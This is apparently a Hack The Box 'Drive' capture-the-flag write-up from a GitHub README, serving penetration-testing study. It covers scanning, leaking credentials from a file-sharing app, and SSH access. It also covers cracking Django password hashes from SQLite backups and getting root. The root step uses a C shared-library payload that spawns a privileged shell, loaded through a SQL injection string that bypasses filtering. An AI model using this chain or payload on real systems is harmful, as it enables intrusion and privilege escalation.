Giter Club home page Giter Club logo

drive-hackthebox-ctf's Introduction

DRIVER CTF WRITUP

Enumeretion

nmap -A -Sv -Sc drive.htb

Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-18 17:30 EDT
Nmap scan report for driver.htb (10.10.11.235)
Host is up (0.038s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT     STATE    SERVICE VERSION
22/tcp   open     ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 27:5a:9f:db:91:c3:16:e5:7d:a6:0d:6d:cb:6b:bd:4a (RSA)
|   256 9d:07:6b:c8:47:28:0d:f2:9f:81:f2:b8:c3:a6:78:53 (ECDSA)
|_  256 1d:30:34:9f:79:73:69:bd:f6:67:f3:34:3c:1f:f9:4e (ED25519)
80/tcp   open     http    nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://drive.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
3000/tcp filtered ppp
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.07 seconds

nmap -p- drive.htb

Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-18 17:33 EDT
Nmap scan report for drive.htb (10.10.11.235)
Host is up (0.035s latency).
Not shown: 65532 closed tcp ports (conn-refused)
PORT     STATE    SERVICE
22/tcp   open     ssh
80/tcp   open     http
3000/tcp filtered ppp

Nmap done: 1 IP address (1 host up) scanned in 35.01 seconds

With these two scans we note that we have 3 ports of which one is filtered, the 3000, the 80 for a HTTP server and 22 for a SSH

Web Enumerations

The app is probably for managing documents in the cloud.

Without registering in the application, since it allows it we notice in the /home private note ./pics/interesting_file.png We want to try to see if it is possible to read the content of that note and maybe others since the backend lists them via url like this drive.htb/100/getFileDetail/ (we can see this url once we create an account and get session tokens)

With burp’s intruder we go looking for all possible files in the backend and find great results! ./pics/attack_burp.png now we just have to figure out how we can read those files since the requests respond like this : (

{"status": "unauthorized"}

with gobuster then let’s look at all the possible subdomains starting with drive.htb/100/ to see if there is anything interesting.

gobuster dir -u http://drive.htb/100 --cookies 'Cookie: csrftoken=AlankMlxInGpRCoOAMEYbWjJ7w7WAgcT; sessionid=4ue8dm8pmi5innjghx5i08tuvdi7j49e' -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://drive.htb/100
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes:   404
[+] Cookies:                 Cookie: csrftoken=AlankMlxInGpRCoOAMEYbWjJ7w7WAgcT; sessionid=4ue8dm8pmi5innjghx5i08tuvdi7j49e
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/updates              (Status: 302) [Size: 0] [--> /login/]
/update               (Status: 302) [Size: 0] [--> /login/]
/blocks               (Status: 302) [Size: 0] [--> /login/]
/block                (Status: 301) [Size: 0] [--> /100/block/]
/updated              (Status: 302) [Size: 0] [--> /login/]
/delete               (Status: 302) [Size: 0] [--> /login/]
Progress: 6900 / 207644 (3.32%)^C
[!] Keyboard interrupt detected, terminating.
Progress: 6914 / 207644 (3.33%)
===============================================================
Finished
===============================================================

We notice the presence of a route /block that responds with 302 code, interesting let’s go right away to test it with some hidden files!!!

Nice we have a Data Leak!! ./pics/dataleak.png We have just obtained credentials, we immediately deprive the foothold!!

PE

With powncat (c2) we start a connection to the user Martin

python3 -m pwncat 
  'class': algorithms.Blowfish,
[10:19:27] Welcome to pwncat 🐈!                                                                                                                         __main__.py:164
(local) pwncat$ connect ssh://[email protected]
Password: *****************
[10:20:10] drive.htb:22: registered new host w/ db

we are in!!

(remote) martin@drive:/home/martin$ whoami
martin

Enumerating the file system we notice an interesting folder within /var/www, the backups folder. Unfortunately, the files are password protected so we have to find a way to access them.

Remembering the presence of a filtered port (3000) we note that inside the machine where we landed we can contact the service.

curl 127.0.0.1:3000
<!DOCTYPE html>
<html lang="en-US" class="theme-">
<head>
	  <meta charset="utf-8">
	  <meta name="viewport" content="width=device-width, initial-scale=1">
	  <title> Gitea: Git with a cup of tea</title>

We have notice that, into the server are present a Gitea service. Let’s try to forword the port fopr access to web server into kali.

ssh -L 8000:127.0.0.1:3000 [email protected]

Visiting now our localhost on the 8000 within kali we can visit the web server!!! ./pics/gitea.png

Returning to the backups folder and analyzing the non-7zip backup we notice the presence of a list of users with their passwords

sqlite> .tables
accounts_customuser                   auth_permission                     
accounts_customuser_groups            django_admin_log                    
accounts_customuser_user_permissions  django_content_type                 
accounts_g                            django_migrations                   
accounts_g_users                      django_session                      
auth_group                            myApp_file                          
auth_group_permissions                myApp_file_groups                   
sqlite> SELECT * FROM accounts_customuser
   ...> ;
21|sha1$W5IGzMqPgAUGMKXwKRmi08$030814d90a6a50ac29bb48e0954a891323******|2022-12-26 05:48:27.497873|0|jamesMason|||[email protected]|0|1|2022-12-23 12:33:04
22|sha1$E9cadw34Gx4E59Qt18NLXR$60919b923803c52057c0cdd1d58f0409e7******|2022-12-24 12:55:10|0|martinCruz|||[email protected]|0|1|2022-12-23 12:35:02
23|sha1$kyvDtANaFByRUMNSXhjvMc$9e77fb56c31e7ff032f8deb1f0b5e8f42e******|2022-12-24 13:17:45|0|tomHands|||[email protected]|0|1|2022-12-23 12:37:45
24|sha1$ALgmoJHkrqcEDinLzpILpD$4b835a084a7c65f5fe966d522c0efcdd1d******|2022-12-24 16:51:53|0|crisDisel|||[email protected]|0|1|2022-12-23 12:39:15
30|sha1$jzpj8fqBgy66yby2vX5XPa$52f17d6118fce501e3b60de360d4c31133******|2022-12-26 05:43:40.388717|1|admin|||[email protected]|1|1|2022-12-26 05:30:58.003372

Let’s try logging into gitea with the user martinCruz and his old password found earlier.

We are inside and have access to the repository of the application ./pics/repo.png We can also see the script that is in charge of making the backups maybe we find the password that zippers them. ./pics/password.png Now we can unzip the archive with this password.

7z e 1_Nov_db_backup.sqlite3.7z -o/tmp

7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,2 CPUs AMD EPYC 7302P 16-Core Processor                (830F10),ASM,AES-NI)

Scanning the drive for archives:
1 file, 12226 bytes (12 KiB)

Extracting archive: 1_Nov_db_backup.sqlite3.7z
--
Path = 1_Nov_db_backup.sqlite3.7z
Type = 7z
Physical Size = 12226
Headers Size = 146
Method = LZMA2:22 7zAES
Solid = -
Blocks = 1

  
Enter password (will not be echoed):

Would you like to replace the existing file:
  Path:     ./db.sqlite3
  Size:     3760128 bytes (3672 KiB)
  Modified: 2022-12-26 05:51:24
with the file from archive:
  Path:     db.sqlite3
  Size:     3760128 bytes (3672 KiB)
  Modified: 2023-09-01 18:25:59
? (Y)es / (N)o / (A)lways / (S)kip all / A(u)to rename all / (Q)uit? y

All archives contain different hashes maybe this one is lucky.

sqlite3 db.sqlite3 
SQLite version 3.31.1 2020-01-27 19:55:54
Enter ".help" for usage hints.
sqlite> SELECT * FROM accounts_customuser;
21|sha1$W5IGzMqPgAUGMKXwKRmi08$030814d90a6a50ac29bb48e0954a8913230*****|2022-12-26 05:48:27.497873|0|jamesMason|||[email protected]|0|1|2022-12-23 12:33:04
22|sha1$E9cadw34Gx4E59Qt18NLXR$60919b923803c52057c0cdd1d58f0409e72*****|2022-12-24 12:55:10|0|martinCruz|||[email protected]|0|1|2022-12-23 12:35:02
23|sha1$Ri2bP6RVoZD5XYGzeYWr7c$4053cb928103b6a9798b2521c4100db8896*****|2022-12-24 13:17:45|0|tomHands|||[email protected]|0|1|2022-12-23 12:37:45
24|sha1$ALgmoJHkrqcEDinLzpILpD$4b835a084a7c65f5fe966d522c0efcdd1d6*****|2022-12-24 16:51:53|0|crisDisel|||[email protected]|0|1|2022-12-23 12:39:15
30|sha1$jzpj8fqBgy66yby2vX5XPa$52f17d6118fce501e3b60de360d4c311337*****|2022-12-26 05:43:40.388717|1|admin|||[email protected]|1|1|2022-12-26 05:30:58.003372
sqlite>

Now we can try to crak the interesting hash with hascat

hashcat -m 124 hash.tom.3 /usr/share/wordlists/rockyou.txt

Nice we have obtain the new password for tom

Inside tom’s home directory we find a script that appears to simulate the site from the command line With simple reverse practices we will find the pwds within the main of the executable

Reading the executable shows an interesting function that appears to run a sql querry

We will opt for a simple approach by loading a malicious extension into sql with a payload that bypasses sanitization

EXTENCION s.so

#include <stdio.h>
__attribute__ ((__constructor__))
void attack(void){
  system("/bin/bash -p");
}

PAYLOAD

"+load_extension(char(46,47,115));--

~”~ => Payload start + => Concat char => bypass lang

Now we are root but the last step is load the user path couse whgen we obtain root sheel the systenm dosent’t load the group id

export PATH=/bin

drive-hackthebox-ctf's People

Contributors

mattiacossu avatar

Watchers

avatar avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.